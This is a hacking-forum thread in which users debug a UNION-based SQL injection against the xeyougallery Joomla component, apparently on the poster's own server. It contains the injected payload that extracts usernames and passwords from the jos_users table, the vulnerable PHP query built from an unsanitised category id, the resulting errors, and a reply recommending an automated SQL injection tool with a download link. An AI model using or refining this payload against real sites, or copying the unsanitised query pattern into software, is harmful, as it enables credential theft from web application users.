xeyougallery SQL injection

No explicit questions like "how do I hack xxx.com" please!
ayu
Staff
Staff

xeyougallery SQL injection

Post by ayu »

Experimenting with an SQL injection on my home server.
And I need extra eyes to find the error, because I can't seem to figure out why it's giving me an error.

I printed out the errors and query on the page so that I could debug it.
Notice the "#_", I'm pretty sure that's for the db prefix.

Code: Select all

SELECT d.* FROM #__xeyougallery_catg AS d WHERE d.parent=1 UNION SELECT id,username,1,password,1,0,1 FROM jos_users -- and d.published=1 ORDER BY d.ordering
I got this error
Error: Unknown column 'd.ordering' in 'order clause'
Which makes me believe that it ignores the comment for some reason (comments shut off?).

I tried to add a "AS d.ordering", but that didn't work either.
I also tried to union with the original query just to see if I can produce the same rows again and "merge" with the rest of the query, but nothing.

SELECT d.* FROM #__xeyougallery_catg AS d WHERE d.parent=1 UNION SELECT d.* FROM jos_xeyougallery_catg AS d and d.published=1 ORDER BY d.ordering
Produces
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and d.published=1 ORDER BY d.ordering' at line 3
And now I'm too tired to work on it further tonight, so I thought id just leave it here and see if anyone has an idea until I wake up tomorrow ^^

Note: The query like this works in the mysql prompt (Because here the comment is interpreted as it should)

SELECT d.* FROM jos_xeyougallery_catg AS d WHERE d.parent=1 UNION SELECT id,username,1,password,1,0,1 FROM jos_users -- and d.published=1 ORDER BY d.ordering
This is the code snippet where the query is generated and used...

$database->setQuery("SELECT d.*" . "\n FROM #__xeyougallery_catg AS d" . "\n WHERE d.parent=$catid and d.published=1 \n"
                    . "\n ORDER BY d.ordering");
            $rows=$database->loadObjectList();
            $num_rows=ceil( count( $rows ) / 4 );
            $index=0;
Note: The new row in the SQL query is suspicious so I think it might have something to do with that when I'm adding the comment, since the comment comments out one line only, and the new line makes it miss that line.

oh well, I will have to think about this over night.
If anyone sees my error, then I would appreciate a pointer ;)
"The best place to hide a tree, is in a forest"

leetnigga
Fame ! Where are the chicks?!

Re: xeyougallery SQL injection

Post by leetnigga »

cats wrote:

SELECT d.* FROM #__xeyougallery_catg AS d WHERE d.parent=1 UNION SELECT d.* FROM jos_xeyougallery_catg AS d and d.published=1 ORDER BY d.ordering
Produces
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and d.published=1 ORDER BY d.ordering' at line 3
That 'and' should be a WHERE.

That's all I got :P

ayu
Staff
Staff

Post by ayu »

ah yeah sorry forgot to remove that when I copy/pasted :P
but yeah I fixed that as well.
"The best place to hide a tree, is in a forest"

hpprinter100

Post by hpprinter100 »

have u tested it with sqli helper? i know its a tool and u like to do things manually but it give u the exploitable url after its done its automated attack.

sqli helper is in the link (from authors site so shud be clean)

http://reiluke.i.ph/blogs/reiluke/2009/02/12/reiluke-tools-download-link/